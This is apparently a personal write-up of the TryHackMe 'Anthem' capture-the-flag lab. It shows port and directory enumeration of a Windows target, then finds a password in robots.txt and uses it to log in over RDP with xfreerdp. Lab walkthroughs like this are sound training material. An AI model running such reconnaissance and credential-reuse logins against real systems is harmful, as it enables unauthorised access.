TryHackMe Anthem

nmap

nmap -sV 10.10.13.83            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 18:24 EST
Nmap scan report for 10.10.13.83
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds

feroxbuster

feroxbuster -u http://10.10.13.83 --status-codes 200

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 邏                 ver: 2.10.1
───────────────────────────┬──────────────────────
   Target Url            │ http://10.10.13.83
   Threads               │ 50
   Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
   Status Codes          │ [200]
   Timeout (secs)        │ 7
 說  User-Agent            │ feroxbuster/2.10.1
   Config File           │ /etc/feroxbuster/ferox-config.toml
   Extract Links         │ true
   HTTP methods          │ [GET]
   Recursion Depth       │ 4
───────────────────────────┴──────────────────────
   Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      126l      323w     5344c http://10.10.13.83/
200      GET       92l      186w     3414c http://10.10.13.83/search
200      GET      103l      185w     3486c http://10.10.13.83/categories
200      GET      104l      188w     3589c http://10.10.13.83/tags
200      GET       30l      162w     1864c http://10.10.13.83/rss
200      GET       10l       19w      379c http://10.10.13.83/rsd/1073
200      GET        6l       16w      325c http://10.10.13.83/opensearch/1073
200      GET      145l      403w     6207c http://10.10.13.83/archive/a-cheers-to-our-it-department
200      GET      148l      378w     6147c http://10.10.13.83/archive/we-are-hiring
200      GET       18l       19w      829c http://10.10.13.83/wlwmanifest/1073
200      GET      126l      323w     5389c http://10.10.13.83/blog
200      GET       95l      189w     4078c http://10.10.13.83/umbraco
200      GET       92l      186w     3464c http://10.10.13.83/Search
200      GET       29l       34w     1035c http://10.10.13.83/sitemap
200      GET      126l      323w     5389c http://10.10.13.83/Blog
200      GET        1l        1w     3276c http://10.10.13.83/umbraco/Application
200      GET      125l      835w    74454c http://10.10.13.83/media/articulate/default/random-mask.jpg
200      GET      111l      205w     4110c http://10.10.13.83/authors
200      GET       30l      162w     1864c http://10.10.13.83/RSS
200      GET      111l      205w     4110c http://10.10.13.83/authors/

more enum

curl -s http://10.10.13.83/robots.txt
UmbracoIsTheBest!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/

The poem is written by Solomon Grundy

The found email address is JD@anthem.com

So let's assume admin is SD@anthem.com

RDP

xfreerdp /u:SG /p:UmbracoIsTheBest! /w:1366 /h:768 /v:10.10.13.83:3389

[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - creating directory [/home/kali/.config/freerdp/certs]
[18:41:39:207] [50537:50538] [INFO][com.freerdp.crypto] - created directory [/home/kali/.config/freerdp/server]
[18:41:40:463] [50537:50538] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:41:40:463] [50537:50538] [WARN][com.freerdp.crypto] - CN = WIN-LU09299160F
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.10.13.83:3389) 
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - Common Name (CN):
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] -      WIN-LU09299160F
[18:41:40:464] [50537:50538] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.10.13.83:3389 (RDP-Server):
        Common Name: WIN-LU09299160F
        Subject:     CN = WIN-LU09299160F
        Issuer:      CN = WIN-LU09299160F
        Thumbprint:  d9:e0:d8:b4:43:5b:05:61:33:83:fd:44:fa:47:c5:ec:8d:64:52:64:17:28:f8:e4:f8:32:85:eb:87:83:ff:f6
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y
[18:41:46:612] [50537:50538] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[18:41:46:612] [50537:50538] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[18:41:46:646] [50537:50538] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[18:41:46:647] [50537:50538] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx

And after that things are easy, admin forgot his password in a backup file.

PreviousPWNEDLABS Identify the AWS Account ID from a Public S3 Bucket NextTryHackMe AttacktiveDirectory

Last updated 1 year ago